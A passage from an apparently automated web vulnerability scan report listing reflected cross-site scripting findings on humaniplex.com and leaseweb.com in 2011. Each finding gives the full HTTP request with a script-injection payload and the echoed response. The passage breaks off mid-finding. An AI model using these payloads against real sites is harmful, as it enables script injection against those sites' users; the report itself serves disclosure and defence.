<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/flirts/?4577f'><script>alert(1)</script>f119a4c3c72=1'>
...[SNIP]...

4.63. http://www.humaniplex.com/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d34d8'><script>alert(1)</script>9d998f23ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?d34d8'><script>alert(1)</script>9d998f23ed=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
Referer: http://www.humaniplex.com/tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1s
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.1.10.1303159302; cookie_accepted_site_tos=1

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:41:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:41:17 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28534


<html>
<head>


<title>
Humaniplex.com (HX) - The Social Network
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="htt
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/index.html?d34d8'><script>alert(1)</script>9d998f23ed=1'>
...[SNIP]...

4.64. http://www.humaniplex.com/mingle [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /mingle

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65acc'><script>alert(1)</script>d61298a3855 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /mingle?65acc'><script>alert(1)</script>d61298a3855=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.5.10.1303159302

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:31 GMT; path=/; domain=.humaniplex.com
Content-Length: 5481
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>


<title>
HX - Mingle!
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humaniplex.com/label
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/mingle/?65acc'><script>alert(1)</script>d61298a3855=1'>
...[SNIP]...

4.65. http://www.humaniplex.com/mingle/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /mingle/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8927'><script>alert(1)</script>7ffae16d95f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mingle/?a8927'><script>alert(1)</script>7ffae16d95f=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.5.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:26 GMT; path=/; domain=.humaniplex.com
Content-Length: 5481
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>


<title>
HX - Mingle!
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humaniplex.com/label
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/mingle/?a8927'><script>alert(1)</script>7ffae16d95f=1'>
...[SNIP]...

4.66. http://www.humaniplex.com/profiles/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /profiles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f84fa'><script>alert(1)</script>5b0a33ae281 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /profiles/?f84fa'><script>alert(1)</script>5b0a33ae281=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.4.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:44:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:44:05 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60476


<html>
<head>


<title>
HX - Recently Updated Profiles
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.hu
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/profiles/?f84fa'><script>alert(1)</script>5b0a33ae281=1'>
...[SNIP]...

4.67. http://www.humaniplex.com/tos/site.html [qs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /tos/site.html

Issue detail

The value of the qs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1547"%3balert(1)//7a625e9c18e was submitted in the qs parameter. This input was echoed as d1547";alert(1)//7a625e9c18e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1sd1547"%3balert(1)//7a625e9c18e HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:41:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:41:23 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18566

       <noscript><meta http-equiv='refresh' content='0; http://www.humaniplex.com/jscs.html?hj=n&ru=http://www.humaniplex.com/tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1sd1547";alert(1
...[SNIP]...
<script type="text/javascript">
           window.location = "http://www.humaniplex.com/jscs.html?hj=y&ru=http://www.humaniplex.com/tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1sd1547";alert(1)//7a625e9c18e"
       </script>
...[SNIP]...

4.68. http://www.humaniplex.com/tos/site.html [qs parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /tos/site.html

Issue detail

The value of the qs request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8840f'><script>alert(1)</script>597271a5404 was submitted in the qs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1s8840f'><script>alert(1)</script>597271a5404 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
Referer: http://www.humaniplex.com/tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1s
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; cookie_js=y

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:41:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:41:03 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18117


<html>
<head>


<title>
HX - Terms of Service
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humaniplex.
...[SNIP]...
<a href='http://www.humaniplex.com/tos/site.html?accepting_tos=1&qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1s8840f'><script>alert(1)</script>597271a5404'>
...[SNIP]...

4.69. http://www.humaniplex.com/user_tools/forgot_password/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /user_tools/forgot_password/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a388'><script>alert(1)</script>362c067777e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user_tools/forgot_password/?4a388'><script>alert(1)</script>362c067777e=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.3.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:22 GMT; path=/; domain=.humaniplex.com
Content-Length: 6667
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>


<title>
HX - Password Assistance
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humanipl
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/user_tools/forgot_password/?4a388'><script>alert(1)</script>362c067777e=1'>
...[SNIP]...

4.70. http://www.humaniplex.com/user_tools/join/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /user_tools/join/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fef86'><script>alert(1)</script>18e63addf2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user_tools/join/?fef86'><script>alert(1)</script>18e63addf2c=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.2.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:21 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11315


<html>
<head>


<title>
HX - Join the Humaniplex.com Community
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http:
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/user_tools/join/?fef86'><script>alert(1)</script>18e63addf2c=1'>
...[SNIP]...

4.71. http://www.leaseweb.com/en [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a21a"><script>alert(1)</script>e9b4983878a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en7a21a"><script>alert(1)</script>e9b4983878a HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:36:48 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en7a21a"><script>alert(1)</script>e9b4983878a">
...[SNIP]...

4.72. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/shopping-cart

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940ec"><script>alert(1)</script>2071b7b58a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en940ec"><script>alert(1)</script>2071b7b58a0/shopping-cart HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:36:23 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en940ec"><script>alert(1)</script>2071b7b58a0/shopping-cart">
...[SNIP]...

4.73. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/shopping-cart

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1082"><script>alert(1)</script>57876b17905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/shopping-cartd1082"><script>alert(1)</script>57876b17905 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:14 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cartd1082"><script>alert(1)</script>57876b17905">
...[SNIP]...

4.74. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/shopping-cart/add

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77893"><script>alert(1)</script>d352239b194f822b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /en77893"><script>alert(1)</script>d352239b194f822b6/shopping-cart/add?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMetered%5D=Metered&article%5B621%5D=621&article%5B124%5D=124&pid=&comment= HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
Origin: http://www.leaseweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:58:50 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en77893"><script>alert(1)</script>d352239b194f822b6/shopping-cart/add?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMe
...[SNIP]...

4.75. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/shopping-cart/add

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b0f6"><script>alert(1)</script>7635ac06e00d08672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /en/shopping-cart3b0f6"><script>alert(1)</script>7635ac06e00d08672/add?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMetered%5D=Metered&article%5B621%5D=621&article%5B124%5D=124&pid=&comment= HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
Origin: http://www.leaseweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:59:44 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cart3b0f6"><script>alert(1)</script>7635ac06e00d08672/add?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMetered%5D=Meter
...[SNIP]...

4.76. http://www.leaseweb.com/en/shopping-cart/add [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/shopping-cart/add

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbf64"><script>alert(1)</script>83fcdd24711b53e65 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /en/shopping-cart/adddbf64"><script>alert(1)</script>83fcdd24711b53e65?combo_id=1314&dummy%5Btype-64_bit%5D=type-32_bit&article%5B664%5D=664&article%5B142%5D=&article%5B817%5D=&article%5B676%5D=676&bandwidth_type%5BStandard%5D=Standard&traffic_type%5BMetered%5D=Metered&article%5B621%5D=621&article%5B124%5D=124&pid=&comment= HTTP/1.1
Host: www.leaseweb.com
